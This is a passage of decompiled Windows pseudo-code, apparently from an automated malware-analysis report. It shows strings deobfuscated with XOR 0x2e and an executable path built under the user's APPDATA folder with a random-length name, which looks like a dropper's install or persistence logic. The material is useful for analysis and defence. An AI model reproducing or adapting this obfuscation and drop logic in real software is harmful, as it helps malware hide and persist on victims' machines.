							}
						}
					}
				} else {
					L21:
					_v29 = 0;
					L22:
					_t1658 =  *(_t1410 + 0x1c);
					if(_t1658 < 0x10) {
						L26:
						_t1659 =  *((intOrPtr*)(_t1410 + 0x34));
						 *(_t1410 + 0x18) = 0;
						 *(_t1410 + 0x1c) = 0xf;
						 *((char*)(_t1410 + 8)) = 0;
						if(_t1659 < 0x10) {
							L30:
							 *[fs:0x0] = _v24;
							return _v29;
						} else {
							_t1424 =  *(_t1410 + 0x20);
							_t1660 = _t1659 + 1;
							_t869 = _t1424;
							if(_t1660 < 0x1000) {
								L29:
								_push(_t1660);
								E0040EDFF(_t1424);
								goto L30;
							} else {
								_t1424 =  *(_t1424 - 4);
								_t1660 =  &(_t1660[0x23]);
								if(_t869 - _t1424 + 0xfffffffc > 0x1f) {
									goto L32;
								} else {
									goto L29;
								}
							}
						}
					} else {
						_t1648 =  *((intOrPtr*)(_t1410 + 8));
						_t1805 =  &(1[_t1658]);
						_t1387 = _t1648;
						if(_t1805 < 0x1000) {
							L25:
							_push(_t1805);
							E0040EDFF(_t1648);
							_t1839 = _t1839 + 8;
							goto L26;
						} else {
							_t50 = _t1648 - 4; // 0xffffe6c2
							_t1424 =  *_t50;
							_t1660 =  &(_t1805[0x23]);
							if(_t1387 - _t1424 + 0xfffffffc > 0x1f) {
								L32:
								E00413527(_t1410, _t1660, __eflags);
								asm("int3");
								asm("int3");
								_push(_t1410);
								_t1412 = _t1839;
								_t1846 = (_t1839 - 0x00000008 & 0xfffffff8) + 4;
								_push(_t1827);
								_v128 =  *((intOrPtr*)(_t1412 + 4));
								_t1830 = _t1846;
								_push(0xffffffff);
								_push(0x42c942);
								_push( *[fs:0x0]);
								_push(_t1412);
								_t1847 = _t1846 - 0x1c0;
								_t875 =  *0x43d054; // 0x7bd02ead
								_t876 = _t875 ^ _t1830;
								_v152 = _t876;
								_push(_t1814);
								_push(_t1809);
								_push(_t876);
								 *[fs:0x0] =  &_v144;
								_t1817 = _t1424;
								_v520 = _t1817;
								_v520 = _t1817;
								_v516 = 0;
								_v500 = 0;
								_v496 = 0xf;
								_v516 = 0;
								_v136 = 0;
								_t878 = E004065E0(_t1817); // executed
								__eflags = _t878;
								if(_t878 != 0) {
									E00406760(_t1412,  &_v360, _t1809);
									_v28 = 0x16;
									_t880 = E00417DF6( &_v360, __eflags);
									asm("cdq");
									E004055C0( &_v384, _t880 % 0xa + 5);
									_v28 = 0x17;
									_v413 = 0x2e;
									_t1810 =  *( *[fs:0x2c]);
									_t884 =  *0x450f24; // 0x0
									__eflags = _t884 -  *((intOrPtr*)(_t1810 + 4));
									if(_t884 >  *((intOrPtr*)(_t1810 + 4))) {
										E0040EF48(_t884, 0x450f24);
										_t1847 = _t1847 + 4;
										__eflags =  *0x450f24 - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x439d90]");
											asm("movups [0x450e90], xmm0");
											 *0x450ea0 = _v413;
											E0040F25B( &_v384, __eflags, 0x42d010);
											E0040EEFE(0x450f24);
											_t1847 = _t1847 + 8;
										}
									}
									_t885 =  *0x450ea0; // 0x0
									__eflags = _t885;
									if(_t885 != 0) {
										asm("movups xmm0, [0x450e90]");
										asm("movaps xmm1, [0x439d30]");
										asm("pxor xmm1, xmm0");
										 *0x450ea0 = _t885 ^ 0x0000002e;
										asm("movups [0x450e90], xmm1");
									}
									_t1428 = 0x450e90;
									_v464 = 0;
									_v448 = 0;
									_v444 = 0xf;
									_v464 = 0;
									_t466 = _t1428 + 1; // 0x450e91
									_t1663 = _t466;
									do {
										_t886 =  *_t1428;
										_t1428 = _t1428 + 1;
										__eflags = _t886;
									} while (_t886 != 0);
									E004026B0(_t1412,  &_v464, 0x450e90, _t1428 - _t1663);
									_v28 = 0x18;
									_t1664 = _v444;
									_t1431 = _v448;
									__eflags = _t1664 - _t1431 - 1;
									if(_t1664 - _t1431 < 1) {
										_v412 = 0;
										_t890 = E00402980(_t1412,  &_v464, _t1810, _t1817, 1, _v412, "\\", 1);
									} else {
										_t471 = _t1431 + 1; // 0x1
										__eflags = _t1664 - 0x10;
										_v448 = _t471;
										_t1150 =  >=  ? _v464 :  &_v464;
										 *((short*)(( >=  ? _v464 :  &_v464) + _t1431)) = 0x5c;
										_t890 =  &_v464;
									}
									_v440 = 0;
									_v424 = 0;
									_v420 = 0;
									asm("movups xmm0, [eax]");
									asm("movups [ebp-0x1a0], xmm0");
									asm("movq xmm0, [eax+0x10]");
									asm("movq [ebp-0x190], xmm0");
									 *(_t890 + 0x10) = 0;
									 *(_t890 + 0x14) = 0xf;
									 *_t890 = 0;
									_v28 = 0x19;
									_t892 = E0040C990( &_v488,  &_v440,  &_v360);
									_t1848 = _t1847 + 4;
									E00402490(_t1412,  &_v408, _t892);
									_t1666 = _v468;
									__eflags = _t1666 - 0x10;
									if(_t1666 < 0x10) {
										L231:
										_v28 = 0x18;
										_t1667 = _v420;
										_v472 = 0;
										_v468 = 0xf;
										_v488 = 0;
										__eflags = _t1667 - 0x10;
										if(_t1667 < 0x10) {
											L235:
											_v28 = 0x17;
											_t1668 = _v444;
											_v424 = 0;
											_v420 = 0xf;
											_v440 = 0;
											__eflags = _t1668 - 0x10;
											if(_t1668 < 0x10) {
												L239:
												_t1849 = _t1848 - 0x18;
												_v316 = _t1849;
												E0040BB90(_t1412, _t1849, _t1668, _t1810,  &_v384);
												_t1850 = _t1849 - 0x18;
												_v28 = 0x1a;
												_t1436 = _t1850;
												E0040BB90(_t1412, _t1436, _t1668, _t1810,  &_v408);
												_v28 = 0x17;
												_t898 = E00406800(_t1412, _t1436, _t1810, _t1817);
												_t1851 = _t1850 + 0x30;
												__eflags = _t898;
												if(_t898 == 0) {
													_t899 =  *0x450f8c; // 0x0
													_v328 = 0x7e72146d;
													_v324 = 0x5c49415c;
													_v320 = 0x4f6a434f;
													_v316 = 0x4f5a;
													_v413 = 0x2e;
													__eflags = _t899 -  *((intOrPtr*)(_t1810 + 4));
													if(_t899 >  *((intOrPtr*)(_t1810 + 4))) {
														E0040EF48(_t899, 0x450f8c);
														_t1851 = _t1851 + 4;
														__eflags =  *0x450f8c - 0xffffffff;
														if(__eflags == 0) {
															asm("movq xmm0, [ebp-0x130]");
															 *0x450d6c = _v320;
															 *0x450d70 = _v316;
															asm("movq [0x450d64], xmm0");
															 *0x450d72 = _v413;
															E0040F25B(_t1436, __eflags, 0x42cfe0);
															E0040EEFE(0x450f8c);
															_t1851 = _t1851 + 8;
														}
													}
													__eflags =  *0x450d72;
													if( *0x450d72 != 0) {
														_t1106 = 0;
														__eflags = 0;
														do {
															 *(_t1106 + 0x450d64) =  *(_t1106 + 0x450d64) ^ 0x0000002e;
															_t1106 = _t1106 + 1;
															__eflags = _t1106 - 0xf;
														} while (_t1106 < 0xf);
													}
													_t1437 = 0x450d64;
													_v464 = 0;
													_v448 = 0;
													_v444 = 0xf;
													_v464 = 0;
													_t570 = _t1437 + 1; // 0x450d65
													_t1669 = _t570;
													asm("o16 nop [eax+eax]");
													do {
														_t900 =  *_t1437;
														_t1437 = _t1437 + 1;
														__eflags = _t900;
													} while (_t900 != 0);
													E004026B0(_t1412,  &_v464, 0x450d64, _t1437 - _t1669);
													_v28 = 0x1d;
													_t1670 = _v444;
													_t1440 = _v448;
													__eflags = _t1670 - _t1440 - 1;
													if(_t1670 - _t1440 < 1) {
														_v412 = 0;
														_t904 = E00402980(_t1412,  &_v464, _t1810, _t1817, 1, _v412, "\\", 1);
													} else {
														_t575 = _t1440 + 1; // 0x1
														__eflags = _t1670 - 0x10;
														_v448 = _t575;
														_t1105 =  >=  ? _v464 :  &_v464;
														 *((short*)(( >=  ? _v464 :  &_v464) + _t1440)) = 0x5c;
														_t904 =  &_v464;
													}
													_v440 = 0;
													_v424 = 0;
													_v420 = 0;
													asm("movups xmm0, [eax]");
													asm("movups [ebp-0x1a0], xmm0");
													asm("movq xmm0, [eax+0x10]");
													asm("movq [ebp-0x190], xmm0");
													 *(_t904 + 0x10) = 0;
													 *(_t904 + 0x14) = 0xf;
													 *_t904 = 0;
													_v28 = 0x1e;
													_t906 = E0040C990( &_v488,  &_v440,  &_v360);
													_t1852 = _t1851 + 4;
													E00402490(_t1412,  &_v408, _t906);
													_t1672 = _v468;
													__eflags = _t1672 - 0x10;
													if(_t1672 < 0x10) {
														L277:
														_v28 = 0x1d;
														_t1673 = _v420;
														_v472 = 0;
														_v468 = 0xf;
														_v488 = 0;
														__eflags = _t1673 - 0x10;
														if(_t1673 < 0x10) {
															L281:
															_v28 = 0x17;
															_t1674 = _v444;
															_v424 = 0;
															_v420 = 0xf;
															_v440 = 0;
															__eflags = _t1674 - 0x10;
															if(_t1674 < 0x10) {
																L285:
																_t1853 = _t1852 - 0x18;
																_v316 = _t1853;
																E0040BB90(_t1412, _t1853, _t1674, _t1810,  &_v384);
																_t1854 = _t1853 - 0x18;
																_v28 = 0x1f;
																_t1445 = _t1854;
																E0040BB90(_t1412, _t1445, _t1674, _t1810,  &_v408);
																_v28 = 0x17;
																_t912 = E00406800(_t1412, _t1445, _t1810, _t1817);
																_t1855 = _t1854 + 0x30;
																__eflags = _t912;
																if(_t912 == 0) {
																	_t913 =  *0x450dd0; // 0x0
																	_v320 = 0x7a72146d;
																	_v316 = 0x2e5e434b;
																	__eflags = _t913 -  *((intOrPtr*)(_t1810 + 4));
																	if(_t913 >  *((intOrPtr*)(_t1810 + 4))) {
																		E0040EF48(_t913, 0x450dd0);
																		_t1855 = _t1855 + 4;
																		__eflags =  *0x450dd0 - 0xffffffff;
																		if(__eflags == 0) {
																			 *0x450d84 = _v320;
																			 *0x450d88 = _v316;
																			E0040F25B(_v316, __eflags, 0x42cfd0);
																			E0040EEFE(0x450dd0);
																			_t1855 = _t1855 + 8;
																		}
																	}
																	_t914 =  *0x450d8b; // 0x0
																	__eflags = _t914;
																	if(_t914 != 0) {
																		 *0x450d84 =  *0x450d84 ^ 0x0000002e;
																		 *0x450d85 =  *0x450d85 ^ 0x0000002e;
																		 *0x450d86 =  *0x450d86 ^ 0x0000002e;
																		 *0x450d87 =  *0x450d87 ^ 0x0000002e;
																		 *0x450d88 =  *0x450d88 ^ 0x0000002e;
																		 *0x450d89 =  *0x450d89 ^ 0x0000002e;
																		 *0x450d8a =  *0x450d8a ^ 0x0000002e;
																		_t1059 = _t914 ^ 0x0000002e;
																		__eflags = _t1059;
																		 *0x450d8b = _t1059;
																	}
																	_t1446 = 0x450d84;
																	_v464 = 0;
																	_v448 = 0;
																	_v444 = 0xf;
																	_v464 = 0;
																	_t668 =  &(_t1446[1]); // 0x450d85
																	_t1675 = _t668;
																	do {
																		_t915 =  *_t1446;
																		_t1446 =  &(_t1446[1]);
																		__eflags = _t915;
																	} while (_t915 != 0);
																	E004026B0(_t1412,  &_v464, 0x450d84, _t1446 - _t1675);
																	_v28 = 0x22;
																	_t1676 = _v444;
																	_t1449 = _v448;
																	__eflags = _t1676 - _t1449 - 1;
																	if(_t1676 - _t1449 < 1) {
																		_v412 = 0;
																		_t919 = E00402980(_t1412,  &_v464, _t1810, _t1817, 1, _v412, "\\", 1);
																	} else {
																		_t673 = _t1449 + 1; // 0x1
																		__eflags = _t1676 - 0x10;
																		_v448 = _t673;
																		_t1058 =  >=  ? _v464 :  &_v464;
																		 *((short*)(( >=  ? _v464 :  &_v464) + _t1449)) = 0x5c;
																		_t919 =  &_v464;
																	}
																	_v440 = 0;
																	_v424 = 0;
																	_v420 = 0;
																	asm("movups xmm0, [eax]");
																	asm("movups [ebp-0x1a0], xmm0");
																	asm("movq xmm0, [eax+0x10]");
																	asm("movq [ebp-0x190], xmm0");
																	 *(_t919 + 0x10) = 0;
																	 *(_t919 + 0x14) = 0xf;
																	 *_t919 = 0;
																	_v28 = 0x23;
																	_t921 = E0040C990( &_v488,  &_v440,  &_v360);
																	_t1856 = _t1855 + 4;
																	E00402490(_t1412,  &_v408, _t921);
																	_t1678 = _v468;
																	__eflags = _t1678 - 0x10;
																	if(_t1678 < 0x10) {
																		L322:
																		_v28 = 0x22;
																		_t1679 = _v420;
																		_v472 = 0;
																		_v468 = 0xf;
																		_v488 = 0;
																		__eflags = _t1679 - 0x10;
																		if(_t1679 < 0x10) {
																			L326:
																			_v28 = 0x17;
																			_t1680 = _v444;
																			_v424 = 0;
																			_v420 = 0xf;
																			_v440 = 0;
																			__eflags = _t1680 - 0x10;
																			if(_t1680 < 0x10) {
																				L330:
																				_t1857 = _t1856 - 0x18;
																				_v316 = _t1857;
																				E0040BB90(_t1412, _t1857, _t1680, _t1810,  &_v384);
																				_t1858 = _t1857 - 0x18;
																				_v28 = 0x24;
																				_t1454 = _t1858;
																				E0040BB90(_t1412, _t1454, _t1680, _t1810,  &_v408);
																				_v28 = 0x17;
																				_t927 = E00406800(_t1412, _t1454, _t1810, _t1817);
																				_t1859 = _t1858 + 0x30;
																				__eflags = _t927;
																				if(_t927 == 0) {
																					E00402440(_t1412,  &_v384);
																					_v28 = 0;
																					E00402440(_t1412,  &_v360);
																					goto L342;
																				} else {
																					_push(_t1454);
																					_t934 = E0040C770( &_v440,  &_v408);
																					_v28 = 0x25;
																					_t935 = E0040C990( &_v488, _t934,  &_v384);
																					_t1856 = _t1859 + 8;
																					_t1466 = _t935;
																					_v28 = 0x26;
																					_t1810 =  *(_t1466 + 0x14);
																					_t1683 =  *(_t1466 + 0x10);
																					__eflags = _t1810 - _t1683 - 4;
																					if(_t1810 - _t1683 < 4) {
																						_v412 = 0;
																						_t1466 = E00402980(_t1412, _t1466, _t1810, _t1817, 4, _v412, ".exe", 4);
																					} else {
																						 *(_t1466 + 0x10) =  &(_t1683->lpSecurityDescriptor);
																						_t1043 = _t1466;
																						__eflags = _t1810 - 0x10;
																						if(_t1810 >= 0x10) {
																							_t1043 =  *_t1466;
																						}
																						 *((intOrPtr*)(_t1043 + _t1683)) = 0x6578652e;
																						 *((char*)(_t1043 +  &(_t1683->lpSecurityDescriptor))) = 0;
																					}
																					 *_t1817 = 0;
																					 *(_t1817 + 0x10) = 0;
																					 *(_t1817 + 0x14) = 0;
																					asm("movups xmm0, [ecx]");
																					asm("movups [esi], xmm0");
																					asm("movq xmm0, [ecx+0x10]");
																					asm("movq [esi+0x10], xmm0");
																					 *(_t1466 + 0x10) = 0;
																					 *(_t1466 + 0x14) = 0xf;
																					 *_t1466 = 0;
																					_t1680 = _v468;
																					__eflags = _t1680 - 0x10;
																					if(_t1680 < 0x10) {
																						L340:
																						_v472 = 0;
																						_v468 = 0xf;
																						_v488 = 0;
																						E00402440(_t1412,  &_v440);
																						E00402440(_t1412,  &_v384);
																						E00402440(_t1412,  &_v360);
																						goto L343;
																					} else {
																						_t1470 = _v488;
																						_t1680 =  &(1[_t1680]);
																						_t942 = _t1470;
																						__eflags = _t1680 - 0x1000;
																						if(_t1680 < 0x1000) {
																							L339:
																							_push(_t1680);
																							E0040EDFF(_t1470);
																							goto L340;
																						} else {
																							_t1470 =  *((intOrPtr*)(_t1470 - 4));
																							_t1680 = _t1680 + 0x23;
																							__eflags = _t942 - _t1470 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L346;
																							} else {
																								goto L339;
																							}
																						}
																					}
																				}
																			} else {
																				_t1537 = _v464;
																				_t1680 =  &(1[_t1680]);
																				_t1044 = _t1537;
																				__eflags = _t1680 - 0x1000;
																				if(_t1680 < 0x1000) {
																					L329:
																					_push(_t1680);
																					E0040EDFF(_t1537);
																					_t1856 = _t1856 + 8;
																					goto L330;
																				} else {
																					_t1470 =  *((intOrPtr*)(_t1537 - 4));
																					_t1680 = _t1680 + 0x23;
																					__eflags = _t1044 -  *((intOrPtr*)(_t1537 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L346;
																					} else {
																						goto L329;
																					}
																				}
																			}
																		} else {
																			_t1538 = _v440;
																			_t1701 =  &(_t1679->nLength);
																			_t1048 = _t1538;
																			__eflags = _t1701 - 0x1000;
																			if(_t1701 < 0x1000) {
																				L325:
																				_push(_t1701);
																				E0040EDFF(_t1538);
																				_t1856 = _t1856 + 8;
																				goto L326;
																			} else {
																				_t1470 =  *((intOrPtr*)(_t1538 - 4));
																				_t1680 = _t1701 + 0x23;
																				__eflags = _t1048 -  *((intOrPtr*)(_t1538 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L325;
																				}
																			}
																		}
																	} else {
																		_t1539 = _v488;
																		_t1702 = _t1678 + 1;
																		_t1052 = _t1539;
																		__eflags = _t1702 - 0x1000;
																		if(_t1702 < 0x1000) {
																			L321:
																			_push(_t1702);
																			E0040EDFF(_t1539);
																			_t1856 = _t1856 + 8;
																			goto L322;
																		} else {
																			_t1470 =  *((intOrPtr*)(_t1539 - 4));
																			_t1680 = _t1702 + 0x23;
																			__eflags = _t1052 -  *((intOrPtr*)(_t1539 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L321;
																			}
																		}
																	}
																} else {
																	_push(_t1445);
																	_t1064 = E0040C770( &_v440,  &_v408);
																	_v28 = 0x20;
																	_t1065 = E0040C990( &_v488, _t1064,  &_v384);
																	_t1856 = _t1855 + 8;
																	_t1544 = _t1065;
																	_v28 = 0x21;
																	_t1810 =  *(_t1544 + 0x14);
																	_t1705 =  *(_t1544 + 0x10);
																	__eflags = _t1810 - _t1705 - 4;
																	if(_t1810 - _t1705 < 4) {
																		_v412 = 0;
																		_t1544 = E00402980(_t1412, _t1544, _t1810, _t1817, 4, _v412, ".exe", 4);
																	} else {
																		 *(_t1544 + 0x10) =  &(_t1705->lpSecurityDescriptor);
																		_t1090 = _t1544;
																		__eflags = _t1810 - 0x10;
																		if(_t1810 >= 0x10) {
																			_t1090 =  *_t1544;
																		}
																		 *((intOrPtr*)(_t1090 + _t1705)) = 0x6578652e;
																		 *((char*)(_t1090 +  &(_t1705->lpSecurityDescriptor))) = 0;
																	}
																	 *_t1817 = 0;
																	 *(_t1817 + 0x10) = 0;
																	 *(_t1817 + 0x14) = 0;
																	asm("movups xmm0, [ecx]");
																	asm("movups [esi], xmm0");
																	asm("movq xmm0, [ecx+0x10]");
																	asm("movq [esi+0x10], xmm0");
																	 *(_t1544 + 0x10) = 0;
																	 *(_t1544 + 0x14) = 0xf;
																	 *_t1544 = 0;
																	_t1706 = _v468;
																	__eflags = _t1706 - 0x10;
																	if(_t1706 < 0x10) {
																		L295:
																		_t1707 = _v420;
																		_v472 = 0;
																		_v468 = 0xf;
																		_v488 = 0;
																		__eflags = _t1707 - 0x10;
																		if(_t1707 < 0x10) {
																			L299:
																			_t1708 = _v364;
																			_v424 = 0;
																			_v420 = 0xf;
																			_v440 = 0;
																			__eflags = _t1708 - 0x10;
																			if(_t1708 < 0x10) {
																				L303:
																				_t1709 = _v340;
																				_v368 = 0;
																				_v364 = 0xf;
																				_v384 = 0;
																				__eflags = _t1709 - 0x10;
																				if(_t1709 < 0x10) {
																					goto L261;
																				} else {
																					_t1546 = _v360;
																					_t1710 = _t1709 + 1;
																					_t1073 = _t1546;
																					__eflags = _t1710 - 0x1000;
																					if(_t1710 < 0x1000) {
																						L306:
																						_push(_t1710);
																						E0040EDFF(_t1546);
																						_t1856 = _t1856 + 8;
																						_v344 = 0;
																						_v340 = 0xf;
																						_v360 = 0;
																						goto L72;
																					} else {
																						_t1470 =  *((intOrPtr*)(_t1546 - 4));
																						_t1680 = _t1710 + 0x23;
																						__eflags = _t1073 -  *((intOrPtr*)(_t1546 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L346;
																						} else {
																							goto L306;
																						}
																					}
																				}
																			} else {
																				_t1547 = _v384;
																				_t1711 = _t1708 + 1;
																				_t1077 = _t1547;
																				__eflags = _t1711 - 0x1000;
																				if(_t1711 < 0x1000) {
																					L302:
																					_push(_t1711);
																					E0040EDFF(_t1547);
																					_t1856 = _t1856 + 8;
																					goto L303;
																				} else {
																					_t1470 =  *((intOrPtr*)(_t1547 - 4));
																					_t1680 = _t1711 + 0x23;
																					__eflags = _t1077 -  *((intOrPtr*)(_t1547 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L346;
																					} else {
																						goto L302;
																					}
																				}
																			}
																		} else {
																			_t1548 = _v440;
																			_t1712 =  &(_t1707->nLength);
																			_t1081 = _t1548;
																			__eflags = _t1712 - 0x1000;
																			if(_t1712 < 0x1000) {
																				L298:
																				_push(_t1712);
																				E0040EDFF(_t1548);
																				_t1856 = _t1856 + 8;
																				goto L299;
																			} else {
																				_t1470 =  *((intOrPtr*)(_t1548 - 4));
																				_t1680 = _t1712 + 0x23;
																				__eflags = _t1081 -  *((intOrPtr*)(_t1548 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L298;
																				}
																			}
																		}
																	} else {
																		_t1549 = _v488;
																		_t1713 = _t1706 + 1;
																		_t1085 = _t1549;
																		__eflags = _t1713 - 0x1000;
																		if(_t1713 < 0x1000) {
																			L294:
																			_push(_t1713);
																			E0040EDFF(_t1549);
																			_t1856 = _t1856 + 8;
																			goto L295;
																		} else {
																			_t1470 =  *((intOrPtr*)(_t1549 - 4));
																			_t1680 = _t1713 + 0x23;
																			__eflags = _t1085 -  *((intOrPtr*)(_t1549 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L294;
																			}
																		}
																	}
																}
															} else {
																_t1550 = _v464;
																_t1674 =  &(_t1674->nLength);
																_t1091 = _t1550;
																__eflags = _t1674 - 0x1000;
																if(_t1674 < 0x1000) {
																	L284:
																	_push(_t1674);
																	E0040EDFF(_t1550);
																	_t1852 = _t1852 + 8;
																	goto L285;
																} else {
																	_t1470 =  *((intOrPtr*)(_t1550 - 4));
																	_t1680 = _t1674 + 0x23;
																	__eflags = _t1091 -  *((intOrPtr*)(_t1550 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L346;
																	} else {
																		goto L284;
																	}
																}
															}
														} else {
															_t1551 = _v440;
															_t1714 =  &(_t1673->nLength);
															_t1095 = _t1551;
															__eflags = _t1714 - 0x1000;
															if(_t1714 < 0x1000) {
																L280:
																_push(_t1714);
																E0040EDFF(_t1551);
																_t1852 = _t1852 + 8;
																goto L281;
															} else {
																_t1470 =  *((intOrPtr*)(_t1551 - 4));
																_t1680 = _t1714 + 0x23;
																__eflags = _t1095 -  *((intOrPtr*)(_t1551 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L346;
																} else {
																	goto L280;
																}
															}
														}
													} else {
														_t1552 = _v488;
														_t1715 = _t1672 + 1;
														_t1099 = _t1552;
														__eflags = _t1715 - 0x1000;
														if(_t1715 < 0x1000) {
															L276:
															_push(_t1715);
															E0040EDFF(_t1552);
															_t1852 = _t1852 + 8;
															goto L277;
														} else {
															_t1470 =  *((intOrPtr*)(_t1552 - 4));
															_t1680 = _t1715 + 0x23;
															__eflags = _t1099 -  *((intOrPtr*)(_t1552 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L346;
															} else {
																goto L276;
															}
														}
													}
												} else {
													_push(_t1436);
													_t1113 = E0040C770( &_v440,  &_v408);
													_v28 = 0x1b;
													_t1114 = E0040C990( &_v488, _t1113,  &_v384);
													_t1856 = _t1851 + 8;
													_t1556 = _t1114;
													_v28 = 0x1c;
													_t1810 =  *(_t1556 + 0x14);
													_t1718 =  *(_t1556 + 0x10);
													__eflags = _t1810 - _t1718 - 4;
													if(_t1810 - _t1718 < 4) {
														_v412 = 0;
														_t1556 = E00402980(_t1412, _t1556, _t1810, _t1817, 4, _v412, ".exe", 4);
													} else {
														 *(_t1556 + 0x10) =  &(_t1718->lpSecurityDescriptor);
														_t1135 = _t1556;
														__eflags = _t1810 - 0x10;
														if(_t1810 >= 0x10) {
															_t1135 =  *_t1556;
														}
														 *((intOrPtr*)(_t1135 + _t1718)) = 0x6578652e;
														 *((char*)(_t1135 +  &(_t1718->lpSecurityDescriptor))) = 0;
													}
													 *_t1817 = 0;
													 *(_t1817 + 0x10) = 0;
													 *(_t1817 + 0x14) = 0;
													asm("movups xmm0, [ecx]");
													asm("movups [esi], xmm0");
													asm("movq xmm0, [ecx+0x10]");
													asm("movq [esi+0x10], xmm0");
													 *(_t1556 + 0x10) = 0;
													 *(_t1556 + 0x14) = 0xf;
													 *_t1556 = 0;
													_t1719 = _v468;
													__eflags = _t1719 - 0x10;
													if(_t1719 < 0x10) {
														L249:
														_t1720 = _v420;
														_v472 = 0;
														_v468 = 0xf;
														_v488 = 0;
														__eflags = _t1720 - 0x10;
														if(_t1720 < 0x10) {
															L253:
															_t1721 = _v364;
															_v424 = 0;
															_v420 = 0xf;
															_v440 = 0;
															__eflags = _t1721 - 0x10;
															if(_t1721 < 0x10) {
																L257:
																_t1722 = _v340;
																_v368 = 0;
																_v364 = 0xf;
																_v384 = 0;
																__eflags = _t1722 - 0x10;
																if(_t1722 < 0x10) {
																	L261:
																	_v344 = 0;
																	_v340 = 0xf;
																	_v360 = 0;
																	goto L72;
																} else {
																	_t1557 = _v360;
																	_t1723 = _t1722 + 1;
																	_t1118 = _t1557;
																	__eflags = _t1723 - 0x1000;
																	if(_t1723 < 0x1000) {
																		L260:
																		_push(_t1723);
																		E0040EDFF(_t1557);
																		_t1856 = _t1856 + 8;
																		goto L261;
																	} else {
																		_t1470 =  *((intOrPtr*)(_t1557 - 4));
																		_t1680 = _t1723 + 0x23;
																		__eflags = _t1118 -  *((intOrPtr*)(_t1557 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L260;
																		}
																	}
																}
															} else {
																_t1558 = _v384;
																_t1724 = _t1721 + 1;
																_t1122 = _t1558;
																__eflags = _t1724 - 0x1000;
																if(_t1724 < 0x1000) {
																	L256:
																	_push(_t1724);
																	E0040EDFF(_t1558);
																	_t1856 = _t1856 + 8;
																	goto L257;
																} else {
																	_t1470 =  *((intOrPtr*)(_t1558 - 4));
																	_t1680 = _t1724 + 0x23;
																	__eflags = _t1122 -  *((intOrPtr*)(_t1558 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L346;
																	} else {
																		goto L256;
																	}
																}
															}
														} else {
															_t1559 = _v440;
															_t1725 =  &(_t1720->nLength);
															_t1126 = _t1559;
															__eflags = _t1725 - 0x1000;
															if(_t1725 < 0x1000) {
																L252:
																_push(_t1725);
																E0040EDFF(_t1559);
																_t1856 = _t1856 + 8;
																goto L253;
															} else {
																_t1470 =  *((intOrPtr*)(_t1559 - 4));
																_t1680 = _t1725 + 0x23;
																__eflags = _t1126 -  *((intOrPtr*)(_t1559 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L346;
																} else {
																	goto L252;
																}
															}
														}
													} else {
														_t1560 = _v488;
														_t1726 = _t1719 + 1;
														_t1130 = _t1560;
														__eflags = _t1726 - 0x1000;
														if(_t1726 < 0x1000) {
															L248:
															_push(_t1726);
															E0040EDFF(_t1560);
															_t1856 = _t1856 + 8;
															goto L249;
														} else {
															_t1470 =  *((intOrPtr*)(_t1560 - 4));
															_t1680 = _t1726 + 0x23;
															__eflags = _t1130 -  *((intOrPtr*)(_t1560 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L346;
															} else {
																goto L248;
															}
														}
													}
												}
											} else {
												_t1561 = _v464;
												_t1668 =  &(_t1668->nLength);
												_t1136 = _t1561;
												__eflags = _t1668 - 0x1000;
												if(_t1668 < 0x1000) {
													L238:
													_push(_t1668);
													E0040EDFF(_t1561);
													_t1848 = _t1848 + 8;
													goto L239;
												} else {
													_t1470 =  *((intOrPtr*)(_t1561 - 4));
													_t1680 = _t1668 + 0x23;
													__eflags = _t1136 -  *((intOrPtr*)(_t1561 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L346;
													} else {
														goto L238;
													}
												}
											}
										} else {
											_t1562 = _v440;
											_t1727 =  &(_t1667->nLength);
											_t1140 = _t1562;
											__eflags = _t1727 - 0x1000;
											if(_t1727 < 0x1000) {
												L234:
												_push(_t1727);
												E0040EDFF(_t1562);
												_t1848 = _t1848 + 8;
												goto L235;
											} else {
												_t1470 =  *((intOrPtr*)(_t1562 - 4));
												_t1680 = _t1727 + 0x23;
												__eflags = _t1140 -  *((intOrPtr*)(_t1562 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L346;
												} else {
													goto L234;
												}
											}
										}
									} else {
										_t1563 = _v488;
										_t1728 = _t1666 + 1;
										_t1144 = _t1563;
										__eflags = _t1728 - 0x1000;
										if(_t1728 < 0x1000) {
											L230:
											_push(_t1728);
											E0040EDFF(_t1563);
											_t1848 = _t1848 + 8;
											goto L231;
										} else {
											_t1470 =  *((intOrPtr*)(_t1563 - 4));
											_t1680 = _t1728 + 0x23;
											__eflags = _t1144 -  *((intOrPtr*)(_t1563 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L346;
											} else {
												goto L230;
											}
										}
									}
								} else {
									_t1156 =  &_v312;
									__imp__SHGetFolderPathA(0, 0x1a, 0, 0, _t1156); // executed
									__eflags = _t1156;
									if(__eflags < 0) {
										_t1729 = E00418B65(_t1412, _t1809, _t1817, __eflags, "APPDATA");
										_t1847 = _t1847 + 4;
										_t1564 = _t1729;
										_t74 = _t1564 + 1; // 0x1
										_t1810 = _t74;
										do {
											_t1158 =  *_t1564;
											_t1564 = _t1564 + 1;
											__eflags = _t1158;
										} while (_t1158 != 0);
										_t1565 = _t1564 - _t1810;
										__eflags = _t1565;
